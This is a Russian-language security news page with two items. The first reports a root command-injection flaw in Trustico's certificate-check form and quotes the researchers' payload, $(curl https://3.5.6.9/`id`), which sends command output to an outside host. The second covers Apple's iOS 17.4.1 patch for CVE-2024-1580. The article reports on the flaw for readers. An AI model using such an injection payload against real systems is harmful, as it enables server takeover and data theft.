Все сертификаты Trustico отзовут из-за полной компрометации сервера

Все сертификаты Trustico отзовут из-за полной компрометации сервера

Ранее освещенная история с проблемными сертификатами, полученными через реселлера Trustico, усугубилась новыми подробностями. В веб-интерфейсе сервиса была обнаружена уязвимость, позволяющая получить к серверу root-доступ.

Если раньше эксперты только гадали, что может быть причиной того, что Trustico решила отозвать выданные сертификаты, то сейчас ситуация начинает проясняться. Похоже, что такое решение связано с киберинцидентом, подорвавшим безопасность реселлера.

Сама брешь имеет довольно посредственный характер — допускается ввод без экранирования спецсимволов. Таким образом, если кто-либо введет в форме проверки сертификата шелл-операторы, они будут исполнены на серверы с правами root.

Об этой проблеме сообщили эксперты Manawyrm и Predrag Cujanović в Twitter.

В качестве примера специалисты приводят ввод следующую строку:

$(curl https://3.5.6.9/`id`)

Которая отправит на хост запрос:

3.5.6.9 - [01/Mar/2018:09:52:14 -0500] "GET /uid=0(root) HTTP/1.1" 404 209 "-" "curl/7.29.0"

Сообщается, что на данный момент сайт Trustico недоступен. Специалистам пока не удалось выяснить, позволяет ли данная брешь скомпрометировать приватные ключи сертификатов, однако одному из исследователей удалось найти в конфигурации секретный ключ для SSL-сертификта домена «*.trustico.com».

Следовательно, в ближайшее время DigiCert и Comodo отреагируют на инцидент, что, скорее всего, приведет к отзыву всех выданных через Trustico сертификатов.

Anti-Malware Яндекс ДзенПодписывайтесь на канал "Anti-Malware" в Telegram, чтобы первыми узнавать о новостях и наших эксклюзивных материалах по информационной безопасности.

iOS и iPadOS 17.4.1 устранили уязвимость удалённого выполнения кода

Apple раскрыла немного подробностей относительно одного из последних обновлений, вышедших на прошлой неделе, — iOS и iPadOS 17.4.1. Оказалось, апдейты устраняют опасную уязвимость, способную привести к удалённому выполнению кода.

Как пишет корпорация, уязвимость, получившая идентификатор CVE-2024-1580, затрагивает следующие модели «яблочных» устройств:

  • iPhone XS и более поздние;
  • iPad Pro (12,9 дюйма) и более поздние;
  • Первое поколение 11-дюймового iPad Pro и более поздние;
  • Третье поколение iPad Air и более поздние;
  • iPad mini пятого поколения и более поздние.

Корень CVE-2024-1580 кроется в библиотеке с открытым исходным кодом — dav1d AV1 (используется для декодирования AV1-видео на многих платформах и девайсах), допускающей запись за пределами границ.

В iOS и iPadOS от бреши страдают два компонента: фреймворк Core Media, предназначенный для обработки мультимедийных данных, и имплементация WebRTC.

Чтобы полностью избавить пользователей от CVE-2024-1580, Apple выпустила патчи для браузера Safari, а также систем macOS Sonoma и VenturavisionOS. За информацию об уязвимости корпорация поблагодарила исследователи из команды Google Project Zero.

Есть мнение, что Apple не сразу опубликовала разъяснения к апдейтам именно потому, что разработчики считают CVE-2024-1580 опасной проблемой.

Anti-Malware Яндекс ДзенПодписывайтесь на канал "Anti-Malware" в Telegram, чтобы первыми узнавать о новостях и наших эксклюзивных материалах по информационной безопасности.

RSS: Новости на портале Anti-Malware.ru